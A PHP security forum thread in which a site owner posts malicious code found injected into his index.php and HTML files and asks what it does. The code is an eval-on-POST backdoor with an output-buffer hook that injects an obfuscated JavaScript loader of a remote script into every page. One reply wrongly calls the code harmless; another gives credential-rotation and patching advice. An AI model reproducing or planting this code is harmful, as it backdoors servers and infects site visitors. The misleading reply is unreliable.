Hack threat advice

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
User avatar
kendall
Forum Regular
Posts: 852
Joined: Tue Jul 30, 2002 10:21 am
Location: Trinidad, West Indies
Contact:

Hack threat advice

Post by kendall »

this seems to be what is showing up on my logs... I'm trying to get a handle on what its intentions were

Code: Select all

if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBiQzREPSdfNzZhcl8yMGFfM2RfMjJTY3JpcHRfNDVuZ2luZV8yMl8yY2JfM2RfMjJfNTZlcnNpb25fMjhfMjkrXzIyXzJjal8zZF8yMl8yMl8yY3VfM2RfNmVhdmlfNjdhXzc0b183Ml8yZXVzZV83MkFnZW50XzNiaWZfMjgoXzc1XzJlaW5kXzY1eE9mXzI4XzIyV2luXzIyKV8zZTApXzI2XzI2KHVfMmVpbmRleE9mXzI4XzIyXzRlVF8yMF8zNl8yMilfM2NfMzBfMjlfMjZfMjYoZG9jdW1lbnRfMmVjb29fNmJfNjlfNjVfMmVpbmRlXzc4T2ZfMjhfMjJtaWVrXzNkMV8yMilfM2MwKV8yNl8yNih0eV83MGVvZl8yOF83YV83MnZ6Xzc0cylfMjFfM2R0eXBlb2YoXzIyQV8yMilfMjkpXzdiXzdhcnZ6Xzc0c18zZF8yMkFfMjJfM2Jldl82MWxfMjhfMjJfNjlmKHdfNjluZF82ZndfMmVfMjJfMmJhXzJiXzIyKWpfM2RqXzJiXzIyK182MStfMjJfNGRhal82ZnJfMjJfMmJiK2ErXzIyXzRkaW5vXzcyXzIyXzJiYitfNjErXzIyXzQyXzc1aV82Y2RfMjIrYl8yYl8yMmpfM2JfMjJfMjlfM2JkXzZmY3VfNmRlbnRfMmV3XzcyXzY5dGUoXzIyXzNjc2NyaXB0XzIwc3JfNjNfM2RfMmZfMmZndW1ibGFyXzJlY25fMmZyc3NfMmZfM2ZfNjlfNjRfM2RfMjIraitfMjJfM2VfM2NfNWNfMmZzY3JpcHRfM2VfMjIpXzNiXzdkJzt2YXIgRnVKeD1iQzRELnJlcGxhY2UoL18vZywnJScpO3ZhciB4RnRJSj11bmVzY2FwZShGdUp4KTtldmFsKHhGdElKKX0pKCk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#['"][^\s'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
These seem to be what the hacker is putting in my index.php and html files. along with a "<iframe" link....

ok I'm not running any CMS software and I have changed my FTP and made adjustments to my PHP ini file ...yet other sites of mines are being attacked and hacked as I speak... Is there anything that I should be looking for in my code to help pin point a hole and stop it....
Last edited by Benjamin on Wed May 13, 2009 12:59 pm, edited 1 time in total.
Reason: Changed [quote] to [code=php]
crazycoders
Forum Contributor
Posts: 260
Joined: Tue Oct 28, 2008 7:48 am
Location: Montreal, Qc, Canada

Re: Hack threat advice

Post by crazycoders »

Well he is definitely trying to inject some HTML/SCRIPT code into your page to do what... i'm not sure... If it's only one use, there is no risk, he'll be hacking himself at worst. Maybe he's trying to find vulnerabilities in your code...
User avatar
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: Hack threat advice

Post by kaisellgren »

You said you are not using CMS's, okay. Are you using any PHP scripts? Are all your websites on the same server? This guy probably got into your server through a vulnerability in an application and has now an access to your server.

First you would need to update all scripts you have there to the latest versions. If there are no updates for some scripts, make a google search for vulnerabilities that may exist in the version you have. Eliminate all unnecessary scripts and junk and after that reset everything back to normal and especially change all salts, passwords, etc before putting your sites at public again.

And yes, this means you have to change all FTP credentials, hosting control panel credentials, etc.
Post Reply